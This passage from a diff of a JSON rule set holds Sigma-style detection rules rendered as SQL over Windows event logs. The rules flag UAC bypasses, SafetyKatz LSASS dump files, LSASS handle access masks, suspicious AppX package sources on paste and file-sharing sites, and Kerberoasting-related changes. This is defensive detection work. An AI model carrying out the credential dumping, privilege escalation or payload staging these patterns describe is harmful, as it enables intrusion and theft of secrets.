'%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_eventvwr.yml" + "filename": "win_appxdeployment_server_susp_package_locations.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - File", - "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", - "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Deployment Of The AppX Package Was Blocked By The Policy", + "id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", + "status": "experimental", + "description": "Detects an appx package deployment that was blocked by the local computer policy", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE 
'\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('441', '442', '453', '454'))" ], - "filename": "file_event_win_uac_bypass_consent_comctl32.yml" + "filename": "win_appxdeployment_server_policy_block.yml" }, { - "title": "Suspicious Creation with Colorcpl", - "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "title": "Deployment AppX Package Was Blocked By AppLocker", + "id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", "status": "experimental", - "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "description": "Detects an appx package deployment that was blocked by AppLocker policy", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '412')" ], - "filename": "file_event_win_susp_colorcpl.yml" + "filename": "win_appxdeployment_server_applocker_block.yml" }, { - "title": "Suspicious Interactive PowerShell as SYSTEM", - "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", + "title": "Suspicious Remote AppX Package Locations", + "id": "8b48ad89-10d8-4382-a546-50588c410f0d", "status": "experimental", - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" - ], - 
"level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\'))" - ], - "filename": "file_event_win_susp_system_interactive_powershell.yml" - }, - { - "title": "New Shim Database Created in the Default Directory", - "id": "ee63c85c-6d51-4d12-ad09-04e25877a947", - "status": "test", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", - "author": "frack113", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.sdb' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\apppatch\\\\Custom\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' 
OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" ], - "filename": "file_event_win_creation_new_shim_database.yml" + "filename": "win_appxdeployment_server_susp_domains.yml" }, { - "title": "SafetyKatz Default Dump Filename", - "id": "e074832a-eada-4fd7-94a1-10642b130e16", - "status": "test", - "description": "Detects default lsass dump filename from SafetyKatz", - "author": "Markus Neis", + "title": "Uncommon AppX Package Locations", + "id": "c977cb50-3dff-4a9f-b873-9290f56132f1", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion" ], "falsepositives": [ - "Rare legitimate files with similar filename structure" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND NOT (((Path LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' OR Path LIKE 
'%C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\PrintDialog\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\ImmersiveControlPanel\\\\%' ESCAPE '\\' OR Path LIKE '%x-windowsupdate://%' ESCAPE '\\' OR Path LIKE '%file:///C:/Program\\%20Files%' ESCAPE '\\')) OR ((Path LIKE '%https://statics.teams.cdn.office.net/%' ESCAPE '\\' OR Path LIKE '%microsoft.com%' ESCAPE '\\'))))" ], - "filename": "file_event_win_hktl_safetykatz.yml" + "filename": "win_appxdeployment_server_uncommon_package_locations.yml" }, { - "title": "Suspicious Executable File Creation", - "id": "74babdd6-a758-4549-9632-26535279e654", + "title": "Suspicious AppX Package Installation Attempt", + "id": "898d5fc9-fbc3-43de-93ad-38e97237c344", "status": "experimental", - "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "author": "frack113", + "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate AppX packages not signed by MS used part of an enterprise" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 
'C:\\\\PerfLogs.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '401' AND ErrorCode = '0x80073cff')" ], - "filename": "file_event_win_susp_executable_creation.yml" + "filename": "win_appxdeployment_server_susp_appx_package_installation.yml" }, { - "title": "Pingback Backdoor File Indicators", - "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential Malicious AppX Package Installation Attempts", + "id": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", + "status": "experimental", + "description": "Detects potential installation or installation attempts of known malicious appx packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('400', '401') AND PackageFullName LIKE '%3669e262-ec02-4e9d-bcb4-3d008b4afac9%' ESCAPE '\\')" ], - "filename": "file_event_win_malware_pingback_backdoor.yml" + "filename": "win_appxdeployment_server_mal_appx_names.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - File", - "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "title": "HybridConnectionManager Service Running", + "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", "status": "test", - "description": "Detects the pattern of UAC Bypass 
using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" ], - "filename": "file_event_win_uac_bypass_winsat.yml" + "filename": "win_hybridconnectionmgr_svc_running.yml" }, { - "title": "Suspicious Word Cab File Write CVE-2021-40444", - "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "title": "Loading Diagcab Package From Remote Path", + "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", "status": "experimental", - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", - "author": "Florian Roth (Nextron Systems), Sittikorn S", + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate package hosted on a known and authorized remote location" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "file_event_win_winword_cve_2021_40444.yml" + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", - "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", + "title": "Suspicious Outbound Kerberos Connection - Security", + "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", "status": "test", - "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" + "attack.lateral_movement", + "attack.t1558.003" ], "falsepositives": [ - "Unknown" + "Web Browsers" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\')" + "SELECT * 
FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_cve_2021_1675_printspooler.yml" + "filename": "win_security_susp_outbound_kerberos_connection.yml" }, { - "title": "Windows Shell File Write to Suspicious Folder", - "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", + "title": "Generic Password Dumper Activity on LSASS", + "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", "status": "experimental", - "description": "Detects a Windows executable that writes files to suspicious folders", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects process handle on LSASS process with certain access mask", + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "tags": [ + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" + ], "falsepositives": [ - "Unknown" + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\') AND 
(TargetFilename LIKE 'C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs%' ESCAPE '\\')) OR ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR 
ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" ], - "filename": "file_event_win_shell_write_susp_directory.yml" + "filename": "win_security_susp_lsass_dump_generic.yml" }, { - "title": "Powerup Write Hijack DLL", - 
"id": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "title": "Weak Encryption Enabled and Kerberoast", + "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", "status": "test", - "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", - "author": "Subhash Popuri (@pbssubhash)", + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "author": "@neu5ron", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.001" + "attack.t1562.001" ], "falsepositives": [ - "Any powershell script that creates bat files" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR 
NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" ], - "filename": "file_event_win_hktl_powerup_dllhijacking.yml" + "filename": "win_security_alert_enable_weak_encryption.yml" }, { - "title": "Created Files by Office Applications", - "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "status": "experimental", - "description": "This rule will monitor executable and script file creation by office applications. 
Please add more file extensions or magic bytes to the logic of your choice.", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "title": "Enabled User Right in AD to Control User Objects", + "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "status": "test", + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "author": "@neu5ron", "tags": [ - "attack.t1204.002", - "attack.execution" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE 